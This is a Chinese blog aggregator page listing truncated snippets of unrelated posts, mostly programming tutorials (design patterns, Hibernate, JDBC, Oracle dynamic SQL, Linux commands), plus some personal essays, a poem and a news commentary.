    单例模式什么是设计模式?设计模式可以看做为框架或者是围棋中的”棋谱”,红方当头炮,黑方马来跳.根据一些固定的套路下,能保证局势不会吃亏.在日常的程序设计中,往往有许多业务场景,根据这些场景,大佬们总结出了一些固定的套路.按照这个套路来实现代码,也不会吃亏.什么是单例模式,保证某类在程序中只有一个实例,而不会创建多份实例.单例模式具体的实现方式:可分为”懒汉模式”,”饿汉模式”.饿汉模式类加载的同时
  • 农药趣闻 71f8b6c2dfd3
    一场团战,我方队友一个个上。我说:“想挑战的人排好队,一个一个来。”夏候说:“乔,你咋抢我台词。”我说:“这不是导演欠我工资吗?气不过就。”夏候:“哈哈。”我方兰陵王不知是挂机还怎么,死了很多次。夏候:“看来对面给了很多钱给兰王。”我说:“哈哈,这当然。今天星光璀璨众星云集啊!吾等小辈倍感荣耀啊!”我又说:“兰陵王记得,世界欠你一个小金人。”哇,这帮弟兄们说的话,在下肚子都笑疼了。
  • 2022-02-05 倚剑白云天
    千秋岁床头历换,百岁过多半。山水秀,风雷变。载身天地老,卖赋文章贱。新句好,年来尽付红酥看。莫道春光晚,莫听林莺乱。抒啸傲,忘愁叹。劳劳冰雪调,坎坎烟霞愿。君不见,那人就在松江岸。
  • 20200105善忘 陆水手
    人是善忘的。晚上跟妈妈视频,说起最近村里有个中年人过逝,他家的天塌了,妈妈两晚没睡好。今年村里四队也有个中年人过逝了,他妈妈本来很胖的,现在很瘦,最近老来我家对门的门诊输液。后来,一不小心又聊到以往的苦难,妈妈又流了一把泪。我有的时候不惜命,及时行乐或得过且过,忘了自己肩上还有很多责任。不让家人担心,也是自己的责任。偶尔热血,却总是善忘。说起人生的苦,我跟妈妈说,既然这样我就不要二胎了,省的它以后
  • 2021-08-18 e48c6f9239a1
    忆往事——谨以此文感谢阿荀婶在禹州市方山镇方山寨南麓的半山腰,有一个叫东坡岭荀家门的小山村(不知何故,大思想家政治家荀子的后代,为什么要选择这么偏僻的地方居住),这也是阿荀婶娘家的地方。阿婶全名荀秋红,她的微信名是“阿荀”,我觉得这名有新意、有亲意,也能体现出对婶儿的敬意,就在文中称呼她阿荀婶吧!说是叫婶是长辈,并没有比我年纪大很多,只是她辈分长。阿荀婶还是很年轻漂亮的!1988年9月,21岁的阿
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他